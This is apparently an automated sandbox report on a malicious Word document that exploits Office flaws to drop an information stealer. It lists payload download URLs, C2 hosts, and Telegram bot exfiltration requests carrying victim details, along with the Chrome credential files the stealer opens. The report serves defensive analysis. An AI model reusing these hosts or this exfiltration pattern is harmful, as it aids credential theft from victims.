                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Queries volume information: C:\Users\user\AppData\Roaming\gRpkBp.exe VolumeInformation
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
                Source: Yara match File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: gRpkBp.exe PID: 2060, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: Yara match File source: 00000014.00000002.663140063.000000000043C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match File source: 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
                Source: Yara match File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: gRpkBp.exe PID: 2060, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 1 Scripting | Valid Accounts | 33 Exploitation for Client Execution | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 111 Process Injection | 3 Obfuscated Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Install Root Certificate | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Behavior graph (image not reproduced): Behavior Graph ID: 1483266, Sample: order072724.docx.doc, Startdate: 26/07/2024, Architecture: WINDOWS, Score: 100

                Source | Detection | Scanner | Label | Link
                order072724.docx.doc | 42% | ReversingLabs | Document-Office.Exploit.CVE-2017-0199 |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp | 100% | Avira | EXP/CVE-2018-0798.Gen |
                C:\Users\user\AppData\Roaming\swagodi78811.scr | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Roaming\gRpkBp.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                meridianresourcellc.top | 104.21.52.88 | true | true | | unknown
                reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
                api.telegram.org | 149.154.167.220 | true | true | | unknown
                checkip.dyndns.com | 132.226.247.73 | true | false | | unknown
                checkip.dyndns.org | unknown | unknown | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
                https://meridianresourcellc.top/swagodi.doc | true | Avira URL Cloud: phishing | unknown
                https://meridianresourcellc.top/swagodi.scr | true | Avira URL Cloud: malware | unknown
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] | false | Avira URL Cloud: safe | unknown
                https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] | false | Avira URL Cloud: safe | unknown
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.orgswagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000248D000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 
0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002386000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ocsp.cEQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchswagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/favicon.icogRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://aborters.duckdns.org:8081swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ac.ecosia.org/autocomplete?q=swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://meridianresourcellc.top/swagodi.scrllC:EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://www.google.com/sorry/indexgRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034C2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://anotherarmy.dns.army:8081swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://reallyfreegeoip.orgswagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26agRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/search?q=netgRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/sorry/indextestswagodi78811.scr, 00000014.00000002.664602794.0000000003607000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.664602794.000000000351B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033F8000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://api.telegram.orgswagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.comXswagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.orgXswagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedswagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 172.67.197.72 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 132.226.8.169 | unknown | United States | 16989 | UTMEMUS | false |
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true |
| 188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true |
| 193.122.6.168 | unknown | United States | 31898 | ORACLE-BMC-31898US | false |
| 188.114.96.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false |
| 193.122.130.0 | unknown | United States | 31898 | ORACLE-BMC-31898US | false |
| 158.101.44.242 | unknown | United States | 31898 | ORACLE-BMC-31898US | false |
| 104.21.52.88 | meridianresourcellc.top | United States | 13335 | CLOUDFLARENETUS | true |
| 132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false |
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1483266
                          Start date and time:2024-07-26 23:44:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 1s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:30
                          Number of new started drivers analysed:1
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:order072724.docx.doc
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winDOC@25/31@68/10
                          EGA Information:
                          • Successful, ratio: 40%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 243
                          • Number of non-executed functions: 10
                          Cookbook Comments:
                          • Found application associated with file extension: .doc
                          • Found Word or Excel or PowerPoint or XPS Viewer
